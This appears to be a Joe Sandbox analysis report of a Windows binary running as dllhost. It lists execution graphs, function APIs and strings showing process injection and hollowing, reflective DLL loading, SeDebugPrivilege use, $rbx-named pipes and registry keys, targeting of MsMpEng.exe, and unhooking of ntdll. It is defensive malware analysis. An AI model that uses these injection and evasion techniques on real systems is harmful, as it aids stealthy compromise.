                                                                                                                                                          execution_graph 694 140003204 695 14000322b 694->695 696 14000341d 694->696 697 140003231 695->697 698 14000338b GetProcessHeap HeapAlloc K32EnumProcesses 695->698 699 140003599 ReadFile 696->699 700 140003429 696->700 702 140003382 ExitProcess 697->702 703 14000323d 697->703 701 1400032c9 698->701 721 1400033c9 698->721 699->701 704 1400035c3 699->704 705 140003432 700->705 706 14000358f 700->706 708 140003246 703->708 709 1400032ea RegOpenKeyExW 703->709 704->701 710 1400035d0 GetProcessHeap HeapAlloc 704->710 711 140003534 705->711 712 14000343e 705->712 707 140001f7c 22 API calls 706->707 707->701 708->701 726 140003260 ReadFile 708->726 714 140003353 709->714 715 140003317 RegDeleteValueW RegDeleteValueW RegDeleteValueW 709->715 716 140001cf0 13 API calls 710->716 719 1400020fc ReadFile 711->719 717 140003443 712->717 718 140003480 712->718 713 140001868 31 API calls 713->721 754 14000217c SysAllocString SysAllocString CoInitializeEx 714->754 715->714 738 140003609 716->738 717->701 767 140002c5c 717->767 770 1400020fc 718->770 723 140003543 719->723 721->701 721->713 723->701 729 1400020fc ReadFile 723->729 725 14000335f 731 14000217c 9 API calls 725->731 726->701 732 14000328a 726->732 727 14000363e GetProcessHeap HeapFree 727->701 735 14000355a 729->735 730 140003497 ReadFile 730->701 736 1400034bf 730->736 737 14000336b 731->737 732->701 743 140001868 31 API calls 732->743 735->701 740 140003562 ShellExecuteW 735->740 736->701 741 1400034cc GetProcessHeap HeapAlloc ReadFile 736->741 762 140001f7c GetProcessHeap HeapAlloc 737->762 738->727 744 14000352f 738->744 802 140001eec 738->802 740->701 741->727 746 140003510 741->746 748 1400032b0 743->748 744->727 746->727 774 140002434 746->774 750 140001868 31 API calls 748->750 750->701 755 1400022d8 SysFreeString SysFreeString 754->755 756 1400021bd CoInitializeSecurity 754->756 755->725 757 140002205 CoCreateInstance 756->757 758 1400021f9 756->758 759 1400022d2 CoUninitialize 757->759 760 140002234 VariantInit 757->760 758->757 758->759 759->755 761 14000228a 760->761 761->759 763 140001cf0 13 API calls 762->763 765 140001fba 763->765 764 140001fe8 GetProcessHeap HeapFree 765->764 766 140001eec 5 API calls 765->766 766->765 768 1400020cc 2 API calls 767->768 769 140002c71 768->769 771 140002120 ReadFile 770->771 772 140002143 771->772 773 14000215d 771->773 772->771 772->773 773->701 773->730 775 14000246f 774->775 799 140002726 774->799 777 1400020cc 2 API calls 775->777 798 1400024ae 775->798 775->799 776 1400024d7 CreateProcessW 776->798 777->798 778 1400028e1 OpenProcess 779 1400028f1 TerminateProcess 778->779 778->798 779->798 780 1400020cc GetModuleHandleA GetProcAddress 780->798 781 140002566 VirtualAllocEx 783 140002595 WriteProcessMemory 781->783 781->798 782 14000273f VirtualAllocEx 784 14000276d WriteProcessMemory 782->784 782->798 785 1400025b7 VirtualProtectEx 783->785 783->798 786 14000278f VirtualProtectEx 784->786 784->798 785->798 786->798 787 140002858 VirtualAlloc 791 140002879 Wow64GetThreadContext 787->791 787->798 788 140002682 VirtualAlloc 790 1400026a7 GetThreadContext 788->790 788->798 789 1400027d0 WriteProcessMemory 789->798 793 1400026c4 WriteProcessMemory 790->793 790->798 794 140002891 WriteProcessMemory 791->794 791->798 792 1400025f9 WriteProcessMemory 792->798 795 1400026ef SetThreadContext 793->795 793->798 796 1400028b6 Wow64SetThreadContext 794->796 794->798 797 140002712 ResumeThread 795->797 795->798 796->798 797->798 797->799 798->776 798->778 798->780 798->781 798->782 798->787 798->788 798->789 798->792 798->799 800 140002643 VirtualProtectEx 798->800 801 14000281a VirtualProtectEx 798->801 799->744 800->798 801->798 803 140001f65 802->803 804 140001f0b OpenProcess 802->804 803->727 804->803 805 140001f23 804->805 806 140002bfc 2 API calls 805->806 807 140001f43 806->807 808 140001f5c CloseHandle 807->808 809 140001f51 CloseHandle 807->809 808->803 809->808 530 140003668 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 531 1400036be K32EnumProcesses 530->531 532 14000371b Sleep 531->532 534 1400036d3 531->534 532->531 533 14000370c 533->532 534->533 536 1400031c4 534->536 537 1400031d5 536->537 538 1400031fd 536->538 542 140001868 OpenProcess 537->542 538->534 541 140001868 31 API calls 541->538 543 140001cd1 542->543 544 1400018b0 IsWow64Process 542->544 543->541 545 1400018c7 CloseHandle 544->545 545->543 547 1400018ed 545->547 547->543 548 14000192f OpenProcess 547->548 548->543 549 14000194b OpenProcess 548->549 550 140001a04 NtQueryInformationProcess 549->550 551 14000196a K32GetModuleFileNameExW 549->551 552 140001cc8 CloseHandle 550->552 553 140001a29 550->553 554 1400019b3 CloseHandle 551->554 555 140001983 PathFindFileNameW lstrlenW 551->555 552->543 553->552 557 140001a33 OpenProcessToken 553->557 554->550 556 1400019c1 554->556 555->554 558 1400019a0 StrCpyW 555->558 556->550 559 1400019e0 StrCmpIW 556->559 557->552 560 140001a51 GetTokenInformation 557->560 558->554 559->552 559->556 561 140001af4 560->561 562 140001a79 GetLastError 560->562 564 140001afb CloseHandle 561->564 562->561 563 140001a84 LocalAlloc 562->563 563->561 565 140001a9a GetTokenInformation 563->565 564->552 569 140001b0f 564->569 566 140001ae2 565->566 567 140001ac2 GetSidSubAuthorityCount GetSidSubAuthority 565->567 568 140001ae9 LocalFree 566->568 567->568 568->564 569->552 570 140001b9f StrStrA 569->570 571 140001bc8 569->571 570->569 572 140001bcd 570->572 571->552 572->552 573 140001bf8 VirtualAllocEx 572->573 573->552 574 140001c27 WriteProcessMemory 573->574 574->552 575 140001c46 574->575 583 140002bfc 575->583 586 1400020cc GetModuleHandleA 583->586 587 1400020f5 586->587 588 1400020ec GetProcAddress 586->588 588->587 589 140003728 590 140003735 589->590 592 140003755 ConnectNamedPipe 590->592 593 14000374a Sleep 590->593 599 140002300 AllocateAndInitializeSid 590->599 594 1400037b3 Sleep 592->594 595 140003764 ReadFile 592->595 593->590 597 1400037be DisconnectNamedPipe 594->597 596 140003787 WriteFile 595->596 595->597 596->597 597->592 600 14000241b 599->600 601 14000235d SetEntriesInAclW 599->601 600->590 601->600 602 1400023a1 LocalAlloc 601->602 602->600 603 1400023b5 InitializeSecurityDescriptor 602->603 603->600 604 1400023c5 SetSecurityDescriptorDacl 603->604 604->600 605 1400023dc CreateNamedPipeW 604->605 605->600 606 140002d38 609 140002d4c 606->609 610 140002d5e OpenMutexW 609->610 611 140002d84 CloseHandle 610->611 612 140002d77 Sleep 610->612 657 140002a0c 611->657 612->610 615 140002a0c 14 API calls 616 140002da5 GetCurrentProcessId OpenProcess 615->616 617 140002dc3 OpenProcessToken 616->617 618 140002e39 RegOpenKeyExW 616->618 621 140002dd9 LookupPrivilegeValueW 617->621 622 140002e30 CloseHandle 617->622 619 140002d41 ExitProcess 618->619 620 140002e6a RegQueryValueExW 618->620 620->619 623 140002e9a RegQueryValueExW 620->623 621->622 624 140002df0 AdjustTokenPrivileges 621->624 622->618 623->619 625 140002eca GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 623->625 624->622 626 140002e2a GetLastError 624->626 625->619 627 140002f3c RegQueryValueExW 625->627 626->622 627->619 628 140002f6c RegCloseKey GetCurrentProcessId 627->628 671 14000200c GetProcessHeap HeapAlloc 628->671 630 140002f83 RegCreateKeyExW 631 14000307d CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 630->631 632 140002fc0 ConvertStringSecurityDescriptorToSecurityDescriptorW 630->632 635 14000151c 50 API calls 631->635 633 140003002 RegCreateKeyExW 632->633 634 140002fe8 RegSetKeySecurity LocalFree 632->634 636 140003073 RegCloseKey 633->636 637 14000303c GetCurrentProcessId RegSetValueExW RegCloseKey 633->637 634->633 638 140003107 635->638 636->631 637->636 639 140003113 ShellExecuteW 638->639 640 140003145 638->640 639->639 639->640 641 14000148c 6 API calls 640->641 642 14000314d 641->642 643 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 642->643 644 140003156 643->644 645 14000148c 6 API calls 644->645 646 14000315f 645->646 647 14000148c 6 API calls 646->647 648 140003168 647->648 649 14000148c 6 API calls 648->649 650 140003171 649->650 651 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 650->651 652 14000317a 651->652 653 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 652->653 654 140003183 653->654 655 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 654->655 656 14000318c GetProcessHeap HeapFree SleepEx 655->656 656->619 658 140002a15 StrCpyW StrCatW GetModuleHandleW 657->658 659 140002bdf 657->659 658->659 660 140002a66 GetCurrentProcess K32GetModuleInformation 658->660 659->615 661 140002bd6 FreeLibrary 660->661 662 140002a96 CreateFileW 660->662 661->659 662->661 663 140002acb CreateFileMappingW 662->663 664 140002af4 MapViewOfFile 663->664 665 140002bcd CloseHandle 663->665 666 140002bc4 CloseHandle 664->666 667 140002b17 664->667 665->661 666->665 667->666 668 140002b30 lstrcmpiA 667->668 670 140002b6e 667->670 668->667 669 140002b70 VirtualProtect VirtualProtect 668->669 669->666 670->666 677 140001cf0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 671->677 673 1400020a5 GetProcessHeap HeapFree 674 140002050 674->673 675 140002071 OpenProcess 674->675 675->674 676 140002087 TerminateProcess CloseHandle 675->676 676->674 678 140001e58 GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 677->678 679 140001d7d 677->679 678->674 679->678 680 140001d92 OpenProcess 679->680 682 140001e43 CloseHandle 679->682 683 140001de9 ReadProcessMemory 679->683 680->679 681 140001daf K32EnumProcessModulesEx 680->681 681->679 681->682 682->679 684 140001e0b 683->684 684->679 684->682 684->683 685 140002cb0 686 140002cbd 685->686 687 140002300 6 API calls 686->687 688 140002cd2 Sleep 686->688 689 140002cdd ConnectNamedPipe 686->689 687->686 688->686 690 140002d21 Sleep 689->690 691 140002cec ReadFile 689->691 692 140002d2c DisconnectNamedPipe 690->692 691->692 693 140002d0f 691->693 692->689 693->692

                                                                                                                                                          Callgraph

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 0000000140002D4C Relevance: 91.3, APIs: 39, Strings: 13, Instructions: 269registrymemorythreadCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 140002d4c-140002d5c 1 140002d5e-140002d75 OpenMutexW 0->1 2 140002d84-140002dc1 CloseHandle call 140002a0c * 2 GetCurrentProcessId OpenProcess 1->2 3 140002d77-140002d82 Sleep 1->3 8 140002dc3-140002dd7 OpenProcessToken 2->8 9 140002e39-140002e64 RegOpenKeyExW 2->9 3->1 12 140002dd9-140002dee LookupPrivilegeValueW 8->12 13 140002e30-140002e33 CloseHandle 8->13 10 1400031b3-1400031c1 9->10 11 140002e6a-140002e94 RegQueryValueExW 9->11 11->10 14 140002e9a-140002ec4 RegQueryValueExW 11->14 12->13 15 140002df0-140002e28 AdjustTokenPrivileges 12->15 13->9 14->10 16 140002eca-140002f36 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 14->16 15->13 17 140002e2a GetLastError 15->17 16->10 18 140002f3c-140002f66 RegQueryValueExW 16->18 17->13 18->10 19 140002f6c-140002fba RegCloseKey GetCurrentProcessId call 14000200c RegCreateKeyExW 18->19 22 14000307d-140003111 CreateThread GetProcessHeap HeapAlloc CreateThread * 2 call 14000151c 19->22 23 140002fc0-140002fe6 ConvertStringSecurityDescriptorToSecurityDescriptorW 19->23 30 140003113-140003143 ShellExecuteW 22->30 31 140003145-1400031ad call 14000148c call 1400011d4 call 14000148c * 3 call 1400011d4 * 3 GetProcessHeap HeapFree SleepEx 22->31 24 140003002-14000303a RegCreateKeyExW 23->24 25 140002fe8-140002ffc RegSetKeySecurity LocalFree 23->25 27 140003073-140003077 RegCloseKey 24->27 28 14000303c-14000306d GetCurrentProcessId RegSetValueExW RegCloseKey 24->28 25->24 27->22 28->27 30->30 30->31 31->10
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
                                                                                                                                                          • String ID: $rbx-dll32$$rbx-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$rbx-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                                                                                                                                          • API String ID: 2725631067-1382791509
                                                                                                                                                          • Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                                                                                                                                          • Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
                                                                                                                                                          • Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                                                                                                                                          • Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744
                                                                                                                                                          Function 0000000140001868 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 287memorystringnativeCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 48 140001868-1400018aa OpenProcess 49 140001cd1-140001ced 48->49 50 1400018b0-1400018c5 IsWow64Process 48->50 51 1400018d5 50->51 52 1400018c7-1400018d3 50->52 53 1400018db-1400018e7 CloseHandle 51->53 52->53 53->49 54 1400018ed-1400018f8 53->54 54->49 55 1400018fe-140001913 54->55 56 140001925 55->56 57 140001915-14000191a 55->57 59 140001927-140001929 56->59 57->49 58 140001920-140001923 57->58 58->59 59->49 60 14000192f-140001945 OpenProcess 59->60 60->49 61 14000194b-140001964 OpenProcess 60->61 62 140001a04-140001a23 NtQueryInformationProcess 61->62 63 14000196a-140001981 K32GetModuleFileNameExW 61->63 64 140001cc8-140001ccb CloseHandle 62->64 65 140001a29-140001a2d 62->65 66 1400019b3-1400019bf CloseHandle 63->66 67 140001983-14000199e PathFindFileNameW lstrlenW 63->67 64->49 65->64 69 140001a33-140001a4b OpenProcessToken 65->69 66->62 68 1400019c1-1400019db 66->68 67->66 70 1400019a0-1400019b0 StrCpyW 67->70 71 1400019e0-1400019f2 StrCmpIW 68->71 69->64 72 140001a51-140001a77 GetTokenInformation 69->72 70->66 71->64 73 1400019f8-140001a02 71->73 74 140001af4 72->74 75 140001a79-140001a82 GetLastError 72->75 73->62 73->71 77 140001afb-140001b09 CloseHandle 74->77 75->74 76 140001a84-140001a98 LocalAlloc 75->76 76->74 78 140001a9a-140001ac0 GetTokenInformation 76->78 77->64 79 140001b0f-140001b16 77->79 81 140001ae2 78->81 82 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 78->82 79->64 80 140001b1c-140001b27 79->80 80->64 83 140001b2d-140001b37 80->83 84 140001ae9-140001af2 LocalFree 81->84 82->84 85 140001b52 83->85 86 140001b39-140001b43 83->86 84->77 88 140001b56-140001b8e call 1400029a4 * 3 85->88 86->64 87 140001b49-140001b50 86->87 87->88 88->64 95 140001b94-140001bb4 call 1400029a4 StrStrA 88->95 98 140001bb6-140001bc6 95->98 99 140001bcd-140001bf2 call 1400029a4 * 2 95->99 98->95 100 140001bc8 98->100 99->64 105 140001bf8-140001c21 VirtualAllocEx 99->105 100->64 105->64 106 140001c27-140001c40 WriteProcessMemory 105->106 106->64 107 140001c46-140001c68 call 140002bfc 106->107 107->64 110 140001c6a-140001c72 107->110 110->64 111 140001c74-140001c81 WaitForSingleObject 110->111 112 140001c83-140001c97 GetExitCodeThread 111->112 113 140001cbd-140001cc2 CloseHandle 111->113 114 140001ca2-140001cbb VirtualFreeEx 112->114 115 140001c99-140001c9f 112->115 113->64 114->113 115->114
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                                                                                                                          • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                                                                                                                                                          • API String ID: 2456419452-2628171563
                                                                                                                                                          • Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                                                                                                                                                          • Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
                                                                                                                                                          • Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                                                                                                                                                          • Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740
                                                                                                                                                          Function 0000000140001CF0 Relevance: 19.6, APIs: 13, Instructions: 131memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4084875642-0
                                                                                                                                                          • Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                                                                                                                                          • Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
                                                                                                                                                          • Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                                                                                                                                          • Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600
                                                                                                                                                          Function 0000000140002300 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3197395349-0
                                                                                                                                                          • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                                                                                                                          • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                                                                                                                                          • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                                                                                                                          • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44
                                                                                                                                                          Function 0000000140002A0C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                                                                                          • String ID: .text$C:\Windows\System32\
                                                                                                                                                          • API String ID: 2721474350-832442975
                                                                                                                                                          • Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                                                                                                                                          • Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
                                                                                                                                                          • Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                                                                                                                                          • Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704
                                                                                                                                                          Function 0000000140003728 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                                                                                          • String ID: M$\\.\pipe\$rbx-childproc
                                                                                                                                                          • API String ID: 2203880229-2840927681
                                                                                                                                                          • Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                                                                                                                                                          • Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
                                                                                                                                                          • Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                                                                                                                                                          • Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704
                                                                                                                                                          Function 0000000140002CB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 160 140002cb0-140002cba 161 140002cbd-140002cd0 call 140002300 160->161 164 140002cd2-140002cdb Sleep 161->164 165 140002cdd-140002cea ConnectNamedPipe 161->165 164->161 166 140002d21-140002d26 Sleep 165->166 167 140002cec-140002d0d ReadFile 165->167 168 140002d2c-140002d35 DisconnectNamedPipe 166->168 167->168 169 140002d0f-140002d14 167->169 168->165 169->168 170 140002d16-140002d1f 169->170 170->168
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                                                                                          • String ID: \\.\pipe\$rbx-control
                                                                                                                                                          • API String ID: 2071455217-3647231676
                                                                                                                                                          • Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                                                                                                                                                          • Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
                                                                                                                                                          • Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                                                                                                                                                          • Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704
                                                                                                                                                          Function 0000000140003668 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 180 140003668-1400036bc GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 181 1400036be-1400036d1 K32EnumProcesses 180->181 182 1400036d3-1400036e2 181->182 183 14000371b-140003724 Sleep 181->183 184 1400036e4-1400036e8 182->184 185 14000370c-140003717 182->185 183->181 186 1400036ea 184->186 187 1400036fb-1400036fe call 1400031c4 184->187 185->183 188 1400036ee-1400036f3 186->188 191 140003702 187->191 189 1400036f5-1400036f9 188->189 190 140003706-14000370a 188->190 189->187 189->188 190->184 190->185 191->190
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3676546796-0
                                                                                                                                                          • Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                                                                                                                                          • Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
                                                                                                                                                          • Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                                                                                                                                          • Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00
